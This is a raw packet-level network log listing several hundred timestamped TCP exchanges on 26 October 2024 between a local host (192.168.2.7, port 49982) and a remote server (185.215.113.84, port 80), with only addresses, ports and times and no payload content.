Oct 26, 2024 07:27:21.618833065 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.618855000 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.618872881 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.620230913 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.620244980 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.620255947 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.620296001 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.620315075 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.633173943 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.633188009 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.633209944 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.633279085 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.633282900 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.633291960 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.633292913 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.633305073 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.633316040 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.633333921 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.633349895 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.647769928 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.647782087 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.647800922 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.647811890 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.647825003 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.647866964 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.647910118 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.647919893 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.647938967 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.647950888 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.647960901 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.647970915 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.647979021 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.647986889 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.647990942 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.648004055 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.648015976 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.648015976 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.648036003 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.648060083 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.648102999 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.648113966 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.648128033 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.648140907 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.648140907 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.648155928 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.648164034 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.648190975 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.648273945 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.648312092 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.648344040 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.648355007 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.648374081 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.648385048 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.648392916 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.648411036 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.648422956 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.648447037 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.648459911 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.648484945 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.648498058 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.648509026 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.648521900 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.648531914 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.648535967 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.648546934 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.648576021 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.648718119 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.648730040 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.648741007 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.648760080 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.648763895 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.648772955 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.648785114 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.648792982 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.648798943 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.648811102 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.648814917 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.648838997 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.648849964 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.653417110 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.653461933 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.653474092 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.653507948 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.653534889 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.693435907 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.693458080 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.693470001 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.693511963 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.693512917 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.693522930 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.693526983 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.693558931 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.693583965 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.693762064 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.693805933 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.693818092 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.693842888 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.693866968 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.693870068 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.693887949 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.693901062 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.693912983 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.693926096 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.693950891 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.694013119 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.694022894 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.694032907 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.694045067 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.694053888 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.694057941 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.694067001 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.694077969 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.694080114 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.694087982 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.694093943 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.694118023 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.694128990 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.694142103 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.694142103 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.694160938 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.694165945 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.694174051 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.694178104 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.694186926 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.694196939 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.694211960 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.694212914 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.694226027 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.694226980 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.694237947 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.694252968 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.694261074 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.694268942 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.694283009 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.694283962 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.694305897 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.694363117 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.694387913 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.694447041 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.694458961 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.694464922 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.694506884 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.694510937 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.694510937 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.694519043 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.694533110 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.694544077 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.694544077 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.694551945 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.694559097 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.694610119 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.694610119 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.694610119 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.694648027 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.694750071 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.694761038 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.694772005 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.694782972 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.694787979 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.694797039 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.694809914 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.694812059 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.694830894 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.694854021 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.694864035 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.694874048 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.694932938 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.695008993 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.695048094 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.695132017 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.695148945 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.695161104 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.695172071 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.695183992 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.695195913 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.695209026 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.695216894 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.695226908 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.695246935 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.695246935 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.695260048 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.695274115 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.695317030 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.695403099 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.695414066 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.695425987 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.695451021 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.695465088 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.695473909 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.695477962 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.695491076 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.695502996 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.695506096 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.695518017 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.695535898 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.695535898 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.695550919 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.695558071 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.695563078 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.695574045 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.695599079 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.736582041 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.736596107 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.736607075 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.736645937 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.736661911 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.737858057 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.737869978 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.737881899 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.737895966 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.737900972 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.737912893 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.737935066 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.751111984 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.751122952 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.751132965 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.751149893 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.751161098 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.751167059 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.751183987 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.751220942 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.765166044 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.765227079 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.765238047 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.765284061 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.765309095 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.765324116 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.765336990 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.765347004 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.765361071 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.765372992 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.765373945 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.765387058 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.765398979 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.765399933 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.765418053 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.765443087 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.765472889 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.765482903 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.765492916 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.765503883 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.765516043 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.765518904 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.765536070 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.765547991 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.765572071 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.765584946 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.765594959 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.765608072 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.765629053 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.765631914 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.765649080 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.765666962 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.765690088 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.765809059 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.765820026 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.765830040 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.765847921 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.765849113 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.765858889 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.765871048 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.765872955 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.765897036 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.765903950 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.765914917 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.765922070 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.765929937 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.765944004 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.765970945 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.765990019 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.766019106 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.766031981 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.766058922 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.766074896 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.766083002 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.766088009 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.766110897 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.766123056 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.766232967 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.766247034 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.766264915 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.766275883 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.766283989 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.766288996 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.766299963 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.766309023 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.766323090 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.766326904 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.766335011 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.766346931 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.766350985 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.766366959 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.766371012 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.766391993 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.766417027 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.771286964 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.771298885 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.771317005 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.771337032 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.771353006 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.811299086 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.811327934 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.811340094 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.811352968 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.811364889 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.811391115 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.811405897 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.811584949 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.811604023 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.811624050 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.811647892 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.811657906 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.811671019 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.811682940 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.811692953 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.811711073 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.811722040 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.811793089 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.811805964 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.811816931 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.811829090 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.811836004 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.811841965 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.811856031 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.811860085 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.811867952 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.811877966 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.811881065 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.811899900 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.811903000 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.811913013 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.811923981 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.811927080 CEST	49982	80	192.168.2.7	185.215.113.84
